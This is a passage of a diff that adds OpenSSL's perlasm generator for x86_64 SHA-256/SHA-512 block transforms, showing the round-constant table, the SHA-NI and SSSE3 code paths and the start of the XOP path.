+	.quad	0xc24b8b70d0f89791,0xc76c51a30654be30
+	.quad	0xc24b8b70d0f89791,0xc76c51a30654be30
+	.quad	0xd192e819d6ef5218,0xd69906245565a910
+	.quad	0xd192e819d6ef5218,0xd69906245565a910
+	.quad	0xf40e35855771202a,0x106aa07032bbd1b8
+	.quad	0xf40e35855771202a,0x106aa07032bbd1b8
+	.quad	0x19a4c116b8d2d0c8,0x1e376c085141ab53
+	.quad	0x19a4c116b8d2d0c8,0x1e376c085141ab53
+	.quad	0x2748774cdf8eeb99,0x34b0bcb5e19b48a8
+	.quad	0x2748774cdf8eeb99,0x34b0bcb5e19b48a8
+	.quad	0x391c0cb3c5c95a63,0x4ed8aa4ae3418acb
+	.quad	0x391c0cb3c5c95a63,0x4ed8aa4ae3418acb
+	.quad	0x5b9cca4f7763e373,0x682e6ff3d6b2b8a3
+	.quad	0x5b9cca4f7763e373,0x682e6ff3d6b2b8a3
+	.quad	0x748f82ee5defb2fc,0x78a5636f43172f60
+	.quad	0x748f82ee5defb2fc,0x78a5636f43172f60
+	.quad	0x84c87814a1f0ab72,0x8cc702081a6439ec
+	.quad	0x84c87814a1f0ab72,0x8cc702081a6439ec
+	.quad	0x90befffa23631e28,0xa4506cebde82bde9
+	.quad	0x90befffa23631e28,0xa4506cebde82bde9
+	.quad	0xbef9a3f7b2c67915,0xc67178f2e372532b
+	.quad	0xbef9a3f7b2c67915,0xc67178f2e372532b
+	.quad	0xca273eceea26619c,0xd186b8c721c0c207
+	.quad	0xca273eceea26619c,0xd186b8c721c0c207
+	.quad	0xeada7dd6cde0eb1e,0xf57d4f7fee6ed178
+	.quad	0xeada7dd6cde0eb1e,0xf57d4f7fee6ed178
+	.quad	0x06f067aa72176fba,0x0a637dc5a2c898a6
+	.quad	0x06f067aa72176fba,0x0a637dc5a2c898a6
+	.quad	0x113f9804bef90dae,0x1b710b35131c471b
+	.quad	0x113f9804bef90dae,0x1b710b35131c471b
+	.quad	0x28db77f523047d84,0x32caab7b40c72493
+	.quad	0x28db77f523047d84,0x32caab7b40c72493
+	.quad	0x3c9ebe0a15c9bebc,0x431d67c49c100d4c
+	.quad	0x3c9ebe0a15c9bebc,0x431d67c49c100d4c
+	.quad	0x4cc5d4becb3e42b6,0x597f299cfc657e2a
+	.quad	0x4cc5d4becb3e42b6,0x597f299cfc657e2a
+	.quad	0x5fcb6fab3ad6faec,0x6c44198c4a475817
+	.quad	0x5fcb6fab3ad6faec,0x6c44198c4a475817
+
+	.quad	0x0001020304050607,0x08090a0b0c0d0e0f
+	.quad	0x0001020304050607,0x08090a0b0c0d0e0f
+	.asciz	"SHA512 block transform for x86_64, CRYPTOGAMS by <appro\@openssl.org>"
+___
+}
+
+######################################################################
+# SIMD code paths
+#
+if ($SZ==4 && $shaext) {{{
+######################################################################
+# Intel SHA Extensions implementation of SHA256 update function.
+#
+my ($ctx,$inp,$num,$Tbl)=("%rdi","%rsi","%rdx","%rcx");
+
+my ($Wi,$ABEF,$CDGH,$TMP,$BSWAP,$ABEF_SAVE,$CDGH_SAVE)=map("%xmm$_",(0..2,7..10));
+my @MSG=map("%xmm$_",(3..6));
+
+$code.=<<___;
+.type	sha256_block_data_order_shaext,\@function,3
+.align	64
+sha256_block_data_order_shaext:
+_shaext_shortcut:
+___
+$code.=<<___ if ($win64);
+	lea	`-8-5*16`(%rsp),%rsp
+	movaps	%xmm6,-8-5*16(%rax)
+	movaps	%xmm7,-8-4*16(%rax)
+	movaps	%xmm8,-8-3*16(%rax)
+	movaps	%xmm9,-8-2*16(%rax)
+	movaps	%xmm10,-8-1*16(%rax)
+.Lprologue_shaext:
+___
+$code.=<<___;
+	lea		K256+0x80(%rip),$Tbl
+	movdqu		($ctx),$ABEF		# DCBA
+	movdqu		16($ctx),$CDGH		# HGFE
+	movdqa		0x200-0x80($Tbl),$TMP	# byte swap mask
+
+	pshufd		\$0x1b,$ABEF,$Wi	# ABCD
+	pshufd		\$0xb1,$ABEF,$ABEF	# CDAB
+	pshufd		\$0x1b,$CDGH,$CDGH	# EFGH
+	movdqa		$TMP,$BSWAP		# offload
+	palignr		\$8,$CDGH,$ABEF		# ABEF
+	punpcklqdq	$Wi,$CDGH		# CDGH
+	jmp		.Loop_shaext
+
+.align	16
+.Loop_shaext:
+	movdqu		($inp),@MSG[0]
+	movdqu		0x10($inp),@MSG[1]
+	movdqu		0x20($inp),@MSG[2]
+	pshufb		$TMP,@MSG[0]
+	movdqu		0x30($inp),@MSG[3]
+
+	movdqa		0*32-0x80($Tbl),$Wi
+	paddd		@MSG[0],$Wi
+	pshufb		$TMP,@MSG[1]
+	movdqa		$CDGH,$CDGH_SAVE	# offload
+	sha256rnds2	$ABEF,$CDGH		# 0-3
+	pshufd		\$0x0e,$Wi,$Wi
+	nop
+	movdqa		$ABEF,$ABEF_SAVE	# offload
+	sha256rnds2	$CDGH,$ABEF
+
+	movdqa		1*32-0x80($Tbl),$Wi
+	paddd		@MSG[1],$Wi
+	pshufb		$TMP,@MSG[2]
+	sha256rnds2	$ABEF,$CDGH		# 4-7
+	pshufd		\$0x0e,$Wi,$Wi
+	lea		0x40($inp),$inp
+	sha256msg1	@MSG[1],@MSG[0]
+	sha256rnds2	$CDGH,$ABEF
+
+	movdqa		2*32-0x80($Tbl),$Wi
+	paddd		@MSG[2],$Wi
+	pshufb		$TMP,@MSG[3]
+	sha256rnds2	$ABEF,$CDGH		# 8-11
+	pshufd		\$0x0e,$Wi,$Wi
+	movdqa		@MSG[3],$TMP
+	palignr		\$4,@MSG[2],$TMP
+	nop
+	paddd		$TMP,@MSG[0]
+	sha256msg1	@MSG[2],@MSG[1]
+	sha256rnds2	$CDGH,$ABEF
+
+	movdqa		3*32-0x80($Tbl),$Wi
+	paddd		@MSG[3],$Wi
+	sha256msg2	@MSG[3],@MSG[0]
+	sha256rnds2	$ABEF,$CDGH		# 12-15
+	pshufd		\$0x0e,$Wi,$Wi
+	movdqa		@MSG[0],$TMP
+	palignr		\$4,@MSG[3],$TMP
+	nop
+	paddd		$TMP,@MSG[1]
+	sha256msg1	@MSG[3],@MSG[2]
+	sha256rnds2	$CDGH,$ABEF
+___
+for($i=4;$i<16-3;$i++) {
+$code.=<<___;
+	movdqa		$i*32-0x80($Tbl),$Wi
+	paddd		@MSG[0],$Wi
+	sha256msg2	@MSG[0],@MSG[1]
+	sha256rnds2	$ABEF,$CDGH		# 16-19...
+	pshufd		\$0x0e,$Wi,$Wi
+	movdqa		@MSG[1],$TMP
+	palignr		\$4,@MSG[0],$TMP
+	nop
+	paddd		$TMP,@MSG[2]
+	sha256msg1	@MSG[0],@MSG[3]
+	sha256rnds2	$CDGH,$ABEF
+___
+	push(@MSG,shift(@MSG));
+}
+$code.=<<___;
+	movdqa		13*32-0x80($Tbl),$Wi
+	paddd		@MSG[0],$Wi
+	sha256msg2	@MSG[0],@MSG[1]
+	sha256rnds2	$ABEF,$CDGH		# 52-55
+	pshufd		\$0x0e,$Wi,$Wi
+	movdqa		@MSG[1],$TMP
+	palignr		\$4,@MSG[0],$TMP
+	sha256rnds2	$CDGH,$ABEF
+	paddd		$TMP,@MSG[2]
+
+	movdqa		14*32-0x80($Tbl),$Wi
+	paddd		@MSG[1],$Wi
+	sha256rnds2	$ABEF,$CDGH		# 56-59
+	pshufd		\$0x0e,$Wi,$Wi
+	sha256msg2	@MSG[1],@MSG[2]
+	movdqa		$BSWAP,$TMP
+	sha256rnds2	$CDGH,$ABEF
+
+	movdqa		15*32-0x80($Tbl),$Wi
+	paddd		@MSG[2],$Wi
+	nop
+	sha256rnds2	$ABEF,$CDGH		# 60-63
+	pshufd		\$0x0e,$Wi,$Wi
+	dec		$num
+	nop
+	sha256rnds2	$CDGH,$ABEF
+
+	paddd		$CDGH_SAVE,$CDGH
+	paddd		$ABEF_SAVE,$ABEF
+	jnz		.Loop_shaext
+
+	pshufd		\$0xb1,$CDGH,$CDGH	# DCHG
+	pshufd		\$0x1b,$ABEF,$TMP	# FEBA
+	pshufd		\$0xb1,$ABEF,$ABEF	# BAFE
+	punpckhqdq	$CDGH,$ABEF		# DCBA
+	palignr		\$8,$TMP,$CDGH		# HGFE
+
+	movdqu	$ABEF,($ctx)
+	movdqu	$CDGH,16($ctx)
+___
+$code.=<<___ if ($win64);
+	movaps	-8-5*16(%rax),%xmm6
+	movaps	-8-4*16(%rax),%xmm7
+	movaps	-8-3*16(%rax),%xmm8
+	movaps	-8-2*16(%rax),%xmm9
+	movaps	-8-1*16(%rax),%xmm10
+	mov	%rax,%rsp
+.Lepilogue_shaext:
+___
+$code.=<<___;
+	ret
+.size	sha256_block_data_order_shaext,.-sha256_block_data_order_shaext
+___
+}}}
+{{{
+
+my $a4=$T1;
+my ($a,$b,$c,$d,$e,$f,$g,$h);
+
+sub AUTOLOAD()		# thunk [simplified] 32-bit style perlasm
+{ my $opcode = $AUTOLOAD; $opcode =~ s/.*:://;
+  my $arg = pop;
+    $arg = "\$$arg" if ($arg*1 eq $arg);
+    $code .= "\t$opcode\t".join(',',$arg,reverse @_)."\n";
+}
+
+sub body_00_15 () {
+	(
+	'($a,$b,$c,$d,$e,$f,$g,$h)=@ROT;'.
+
+	'&ror	($a0,$Sigma1[2]-$Sigma1[1])',
+	'&mov	($a,$a1)',
+	'&mov	($a4,$f)',
+
+	'&ror	($a1,$Sigma0[2]-$Sigma0[1])',
+	'&xor	($a0,$e)',
+	'&xor	($a4,$g)',			# f^g
+
+	'&ror	($a0,$Sigma1[1]-$Sigma1[0])',
+	'&xor	($a1,$a)',
+	'&and	($a4,$e)',			# (f^g)&e
+
+	'&xor	($a0,$e)',
+	'&add	($h,$SZ*($i&15)."(%rsp)")',	# h+=X[i]+K[i]
+	'&mov	($a2,$a)',
+
+	'&xor	($a4,$g)',			# Ch(e,f,g)=((f^g)&e)^g
+	'&ror	($a1,$Sigma0[1]-$Sigma0[0])',
+	'&xor	($a2,$b)',			# a^b, b^c in next round
+
+	'&add	($h,$a4)',			# h+=Ch(e,f,g)
+	'&ror	($a0,$Sigma1[0])',		# Sigma1(e)
+	'&and	($a3,$a2)',			# (b^c)&(a^b)
+
+	'&xor	($a1,$a)',
+	'&add	($h,$a0)',			# h+=Sigma1(e)
+	'&xor	($a3,$b)',			# Maj(a,b,c)=Ch(a^b,c,b)
+
+	'&ror	($a1,$Sigma0[0])',		# Sigma0(a)
+	'&add	($d,$h)',			# d+=h
+	'&add	($h,$a3)',			# h+=Maj(a,b,c)
+
+	'&mov	($a0,$d)',
+	'&add	($a1,$h);'.			# h+=Sigma0(a)
+	'($a2,$a3) = ($a3,$a2); unshift(@ROT,pop(@ROT)); $i++;'
+	);
+}
+
+######################################################################
+# SSSE3 code path
+#
+if ($SZ==4) {	# SHA256 only
+my @X = map("%xmm$_",(0..3));
+my ($t0,$t1,$t2,$t3, $t4,$t5) = map("%xmm$_",(4..9));
+
+$code.=<<___;
+.type	${func}_ssse3,\@function,3
+.align	64
+${func}_ssse3:
+.Lssse3_shortcut:
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	mov	%rsp,%r11		# copy %rsp
+	shl	\$4,%rdx		# num*16
+	sub	\$`$framesz+$win64*16*4`,%rsp
+	lea	($inp,%rdx,$SZ),%rdx	# inp+num*16*$SZ
+	and	\$-64,%rsp		# align stack frame
+	mov	$ctx,$_ctx		# save ctx, 1st arg
+	mov	$inp,$_inp		# save inp, 2nd arh
+	mov	%rdx,$_end		# save end pointer, "3rd" arg
+	mov	%r11,$_rsp		# save copy of %rsp
+___
+$code.=<<___ if ($win64);
+	movaps	%xmm6,16*$SZ+32(%rsp)
+	movaps	%xmm7,16*$SZ+48(%rsp)
+	movaps	%xmm8,16*$SZ+64(%rsp)
+	movaps	%xmm9,16*$SZ+80(%rsp)
+___
+$code.=<<___;
+.Lprologue_ssse3:
+
+	mov	$SZ*0($ctx),$A
+	mov	$SZ*1($ctx),$B
+	mov	$SZ*2($ctx),$C
+	mov	$SZ*3($ctx),$D
+	mov	$SZ*4($ctx),$E
+	mov	$SZ*5($ctx),$F
+	mov	$SZ*6($ctx),$G
+	mov	$SZ*7($ctx),$H
+___
+
+$code.=<<___;
+	#movdqa	$TABLE+`$SZ*2*$rounds`+32(%rip),$t4
+	#movdqa	$TABLE+`$SZ*2*$rounds`+64(%rip),$t5
+	jmp	.Lloop_ssse3
+.align	16
+.Lloop_ssse3:
+	movdqa	$TABLE+`$SZ*2*$rounds`(%rip),$t3
+	movdqu	0x00($inp),@X[0]
+	movdqu	0x10($inp),@X[1]
+	movdqu	0x20($inp),@X[2]
+	pshufb	$t3,@X[0]
+	movdqu	0x30($inp),@X[3]
+	lea	$TABLE(%rip),$Tbl
+	pshufb	$t3,@X[1]
+	movdqa	0x00($Tbl),$t0
+	movdqa	0x20($Tbl),$t1
+	pshufb	$t3,@X[2]
+	paddd	@X[0],$t0
+	movdqa	0x40($Tbl),$t2
+	pshufb	$t3,@X[3]
+	movdqa	0x60($Tbl),$t3
+	paddd	@X[1],$t1
+	paddd	@X[2],$t2
+	paddd	@X[3],$t3
+	movdqa	$t0,0x00(%rsp)
+	mov	$A,$a1
+	movdqa	$t1,0x10(%rsp)
+	mov	$B,$a3
+	movdqa	$t2,0x20(%rsp)
+	xor	$C,$a3			# magic
+	movdqa	$t3,0x30(%rsp)
+	mov	$E,$a0
+	jmp	.Lssse3_00_47
+
+.align	16
+.Lssse3_00_47:
+	sub	\$`-16*2*$SZ`,$Tbl	# size optimization
+___
+sub Xupdate_256_SSSE3 () {
+	(
+	'&movdqa	($t0,@X[1]);',
+	'&movdqa	($t3,@X[3])',
+	'&palignr	($t0,@X[0],$SZ)',	# X[1..4]
+	 '&palignr	($t3,@X[2],$SZ);',	# X[9..12]
+	'&movdqa	($t1,$t0)',
+	'&movdqa	($t2,$t0);',
+	'&psrld		($t0,$sigma0[2])',
+	 '&paddd	(@X[0],$t3);',		# X[0..3] += X[9..12]
+	'&psrld		($t2,$sigma0[0])',
+	 '&pshufd	($t3,@X[3],0b11111010)',# X[14..15]
+	'&pslld		($t1,8*$SZ-$sigma0[1]);'.
+	'&pxor		($t0,$t2)',
+	'&psrld		($t2,$sigma0[1]-$sigma0[0]);'.
+	'&pxor		($t0,$t1)',
+	'&pslld		($t1,$sigma0[1]-$sigma0[0]);'.
+	'&pxor		($t0,$t2);',
+	 '&movdqa	($t2,$t3)',
+	'&pxor		($t0,$t1);',		# sigma0(X[1..4])
+	 '&psrld	($t3,$sigma1[2])',
+	'&paddd		(@X[0],$t0);',		# X[0..3] += sigma0(X[1..4])
+	 '&psrlq	($t2,$sigma1[0])',
+	 '&pxor		($t3,$t2);',
+	 '&psrlq	($t2,$sigma1[1]-$sigma1[0])',
+	 '&pxor		($t3,$t2)',
+	 '&pshufb	($t3,$t4)',		# sigma1(X[14..15])
+	'&paddd		(@X[0],$t3)',		# X[0..1] += sigma1(X[14..15])
+	 '&pshufd	($t3,@X[0],0b01010000)',# X[16..17]
+	 '&movdqa	($t2,$t3);',
+	 '&psrld	($t3,$sigma1[2])',
+	 '&psrlq	($t2,$sigma1[0])',
+	 '&pxor		($t3,$t2);',
+	 '&psrlq	($t2,$sigma1[1]-$sigma1[0])',
+	 '&pxor		($t3,$t2);',
+	'&movdqa	($t2,16*2*$j."($Tbl)")',
+	 '&pshufb	($t3,$t5)',
+	'&paddd		(@X[0],$t3)'		# X[2..3] += sigma1(X[16..17])
+	);
+}
+
+sub SSSE3_256_00_47 () {
+my $j = shift;
+my $body = shift;
+my @X = @_;
+my @insns = (&$body,&$body,&$body,&$body);	# 104 instructions
+
+    if (0) {
+	foreach (Xupdate_256_SSSE3()) {		# 36 instructions
+	    eval;
+	    eval(shift(@insns));
+	    eval(shift(@insns));
+	    eval(shift(@insns));
+	}
+    } else {			# squeeze extra 4% on Westmere and 19% on Atom
+	  eval(shift(@insns));	#@
+	&movdqa		($t0,@X[1]);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&movdqa		($t3,@X[3]);
+	  eval(shift(@insns));	#@
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));	#@
+	  eval(shift(@insns));
+	&palignr	($t0,@X[0],$SZ);	# X[1..4]
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &palignr	($t3,@X[2],$SZ);	# X[9..12]
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));	#@
+	&movdqa		($t1,$t0);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&movdqa		($t2,$t0);
+	  eval(shift(@insns));	#@
+	  eval(shift(@insns));
+	&psrld		($t0,$sigma0[2]);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &paddd		(@X[0],$t3);		# X[0..3] += X[9..12]
+	  eval(shift(@insns));	#@
+	  eval(shift(@insns));
+	&psrld		($t2,$sigma0[0]);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &pshufd	($t3,@X[3],0b11111010);	# X[4..15]
+	  eval(shift(@insns));
+	  eval(shift(@insns));	#@
+	&pslld		($t1,8*$SZ-$sigma0[1]);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&pxor		($t0,$t2);
+	  eval(shift(@insns));	#@
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));	#@
+	&psrld		($t2,$sigma0[1]-$sigma0[0]);
+	  eval(shift(@insns));
+	&pxor		($t0,$t1);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&pslld		($t1,$sigma0[1]-$sigma0[0]);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&pxor		($t0,$t2);
+	  eval(shift(@insns));
+	  eval(shift(@insns));	#@
+	 &movdqa	($t2,$t3);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&pxor		($t0,$t1);		# sigma0(X[1..4])
+	  eval(shift(@insns));	#@
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &psrld		($t3,$sigma1[2]);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&paddd		(@X[0],$t0);		# X[0..3] += sigma0(X[1..4])
+	  eval(shift(@insns));	#@
+	  eval(shift(@insns));
+	 &psrlq		($t2,$sigma1[0]);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &pxor		($t3,$t2);
+	  eval(shift(@insns));	#@
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));	#@
+	 &psrlq		($t2,$sigma1[1]-$sigma1[0]);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &pxor		($t3,$t2);
+	  eval(shift(@insns));	#@
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 #&pshufb	($t3,$t4);		# sigma1(X[14..15])
+	 &pshufd	($t3,$t3,0b10000000);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &psrldq	($t3,8);
+	  eval(shift(@insns));
+	  eval(shift(@insns));	#@
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));	#@
+	&paddd		(@X[0],$t3);		# X[0..1] += sigma1(X[14..15])
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &pshufd	($t3,@X[0],0b01010000);	# X[16..17]
+	  eval(shift(@insns));
+	  eval(shift(@insns));	#@
+	  eval(shift(@insns));
+	 &movdqa	($t2,$t3);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &psrld		($t3,$sigma1[2]);
+	  eval(shift(@insns));
+	  eval(shift(@insns));	#@
+	 &psrlq		($t2,$sigma1[0]);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &pxor		($t3,$t2);
+	  eval(shift(@insns));	#@
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));	#@
+	  eval(shift(@insns));
+	 &psrlq		($t2,$sigma1[1]-$sigma1[0]);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &pxor		($t3,$t2);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));	#@
+	 #&pshufb	($t3,$t5);
+	 &pshufd	($t3,$t3,0b00001000);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&movdqa		($t2,16*2*$j."($Tbl)");
+	  eval(shift(@insns));	#@
+	  eval(shift(@insns));
+	 &pslldq	($t3,8);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&paddd		(@X[0],$t3);		# X[2..3] += sigma1(X[16..17])
+	  eval(shift(@insns));	#@
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+    }
+	&paddd		($t2,@X[0]);
+	  foreach (@insns) { eval; }		# remaining instructions
+	&movdqa		(16*$j."(%rsp)",$t2);
+}
+
+    for ($i=0,$j=0; $j<4; $j++) {
+	&SSSE3_256_00_47($j,\&body_00_15,@X);
+	push(@X,shift(@X));			# rotate(@X)
+    }
+	&cmpb	($SZ-1+16*2*$SZ."($Tbl)",0);
+	&jne	(".Lssse3_00_47");
+
+    for ($i=0; $i<16; ) {
+	foreach(body_00_15()) { eval; }
+    }
+$code.=<<___;
+	mov	$_ctx,$ctx
+	mov	$a1,$A
+
+	add	$SZ*0($ctx),$A
+	lea	16*$SZ($inp),$inp
+	add	$SZ*1($ctx),$B
+	add	$SZ*2($ctx),$C
+	add	$SZ*3($ctx),$D
+	add	$SZ*4($ctx),$E
+	add	$SZ*5($ctx),$F
+	add	$SZ*6($ctx),$G
+	add	$SZ*7($ctx),$H
+
+	cmp	$_end,$inp
+
+	mov	$A,$SZ*0($ctx)
+	mov	$B,$SZ*1($ctx)
+	mov	$C,$SZ*2($ctx)
+	mov	$D,$SZ*3($ctx)
+	mov	$E,$SZ*4($ctx)
+	mov	$F,$SZ*5($ctx)
+	mov	$G,$SZ*6($ctx)
+	mov	$H,$SZ*7($ctx)
+	jb	.Lloop_ssse3
+
+	mov	$_rsp,%rsi
+___
+$code.=<<___ if ($win64);
+	movaps	16*$SZ+32(%rsp),%xmm6
+	movaps	16*$SZ+48(%rsp),%xmm7
+	movaps	16*$SZ+64(%rsp),%xmm8
+	movaps	16*$SZ+80(%rsp),%xmm9
+___
+$code.=<<___;
+	mov	(%rsi),%r15
+	mov	8(%rsi),%r14
+	mov	16(%rsi),%r13
+	mov	24(%rsi),%r12
+	mov	32(%rsi),%rbp
+	mov	40(%rsi),%rbx
+	lea	48(%rsi),%rsp
+.Lepilogue_ssse3:
+	ret
+.size	${func}_ssse3,.-${func}_ssse3
+___
+}
+
+if ($avx) {{
+######################################################################
+# XOP code path
+#
+if ($SZ==8) {	# SHA512 only
+$code.=<<___;
+.type	${func}_xop,\@function,3
+.align	64
+${func}_xop:
+.Lxop_shortcut:
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	mov	%rsp,%r11		# copy %rsp
+	shl	\$4,%rdx		# num*16
+	sub	\$`$framesz+$win64*16*($SZ==4?4:6)`,%rsp
+	lea	($inp,%rdx,$SZ),%rdx	# inp+num*16*$SZ
+	and	\$-64,%rsp		# align stack frame
+	mov	$ctx,$_ctx		# save ctx, 1st arg
+	mov	$inp,$_inp		# save inp, 2nd arh
+	mov	%rdx,$_end		# save end pointer, "3rd" arg
+	mov	%r11,$_rsp		# save copy of %rsp
+___
+$code.=<<___ if ($win64);
+	movaps	%xmm6,16*$SZ+32(%rsp)
+	movaps	%xmm7,16*$SZ+48(%rsp)
+	movaps	%xmm8,16*$SZ+64(%rsp)
+	movaps	%xmm9,16*$SZ+80(%rsp)
+___
+$code.=<<___ if ($win64 && $SZ>4);
+	movaps	%xmm10,16*$SZ+96(%rsp)
+	movaps	%xmm11,16*$SZ+112(%rsp)
+___
+$code.=<<___;
+.Lprologue_xop:
+
+	vzeroupper
+	mov	$SZ*0($ctx),$A
+	mov	$SZ*1($ctx),$B
+	mov	$SZ*2($ctx),$C
+	mov	$SZ*3($ctx),$D
+	mov	$SZ*4($ctx),$E
+	mov	$SZ*5($ctx),$F
+	mov	$SZ*6($ctx),$G
+	mov	$SZ*7($ctx),$H
+	jmp	.Lloop_xop
+___
+					if ($SZ==4) {	# SHA256
+    my @X = map("%xmm$_",(0..3));
+    my ($t0,$t1,$t2,$t3) = map("%xmm$_",(4..7));
+
+$code.=<<___;
+.align	16
+.Lloop_xop:
+	vmovdqa	$TABLE+`$SZ*2*$rounds`(%rip),$t3
+	vmovdqu	0x00($inp),@X[0]
+	vmovdqu	0x10($inp),@X[1]
+	vmovdqu	0x20($inp),@X[2]
+	vmovdqu	0x30($inp),@X[3]
+	vpshufb	$t3,@X[0],@X[0]
+	lea	$TABLE(%rip),$Tbl
+	vpshufb	$t3,@X[1],@X[1]
+	vpshufb	$t3,@X[2],@X[2]
+	vpaddd	0x00($Tbl),@X[0],$t0
+	vpshufb	$t3,@X[3],@X[3]
+	vpaddd	0x20($Tbl),@X[1],$t1
+	vpaddd	0x40($Tbl),@X[2],$t2
+	vpaddd	0x60($Tbl),@X[3],$t3
+	vmovdqa	$t0,0x00(%rsp)
+	mov	$A,$a1
+	vmovdqa	$t1,0x10(%rsp)
+	mov	$B,$a3
+	vmovdqa	$t2,0x20(%rsp)
+	xor	$C,$a3			# magic
+	vmovdqa	$t3,0x30(%rsp)
+	mov	$E,$a0
+	jmp	.Lxop_00_47
+
+.align	16
+.Lxop_00_47:
+	sub	\$`-16*2*$SZ`,$Tbl	# size optimization
+___
+sub XOP_256_00_47 () {
+my $j = shift;
+my $body = shift;
+my @X = @_;
+my @insns = (&$body,&$body,&$body,&$body);	# 104 instructions
+
+	&vpalignr	($t0,@X[1],@X[0],$SZ);	# X[1..4]
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &vpalignr	($t3,@X[3],@X[2],$SZ);	# X[9..12]
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&vprotd		($t1,$t0,8*$SZ-$sigma0[1]);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&vpsrld		($t0,$t0,$sigma0[2]);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &vpaddd	(@X[0],@X[0],$t3);	# X[0..3] += X[9..12]
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&vprotd		($t2,$t1,$sigma0[1]-$sigma0[0]);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&vpxor		($t0,$t0,$t1);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &vprotd	($t3,@X[3],8*$SZ-$sigma1[1]);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&vpxor		($t0,$t0,$t2);		# sigma0(X[1..4])
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &vpsrld	($t2,@X[3],$sigma1[2]);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&vpaddd		(@X[0],@X[0],$t0);	# X[0..3] += sigma0(X[1..4])
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &vprotd	($t1,$t3,$sigma1[1]-$sigma1[0]);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &vpxor		($t3,$t3,$t2);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &vpxor		($t3,$t3,$t1);		# sigma1(X[14..15])
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&vpsrldq	($t3,$t3,8);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&vpaddd		(@X[0],@X[0],$t3);	# X[0..1] += sigma1(X[14..15])
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &vprotd	($t3,@X[0],8*$SZ-$sigma1[1]);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &vpsrld	($t2,@X[0],$sigma1[2]);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &vprotd	($t1,$t3,$sigma1[1]-$sigma1[0]);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &vpxor		($t3,$t3,$t2);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &vpxor		($t3,$t3,$t1);		# sigma1(X[16..17])
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&vpslldq	($t3,$t3,8);		# 22 instructions
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&vpaddd		(@X[0],@X[0],$t3);	# X[2..3] += sigma1(X[16..17])
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&vpaddd		($t2,@X[0],16*2*$j."($Tbl)");
+	  foreach (@insns) { eval; }		# remaining instructions
+	&vmovdqa	(16*$j."(%rsp)",$t2);
+}
+
+    for ($i=0,$j=0; $j<4; $j++) {
+	&XOP_256_00_47($j,\&body_00_15,@X);
+	push(@X,shift(@X));			# rotate(@X)
+    }
+	&cmpb	($SZ-1+16*2*$SZ."($Tbl)",0);
+	&jne	(".Lxop_00_47");
+
+    for ($i=0; $i<16; ) {
+	foreach(body_00_15()) { eval; }
+    }
+
+					} else {	# SHA512
+    my @X = map("%xmm$_",(0..7));
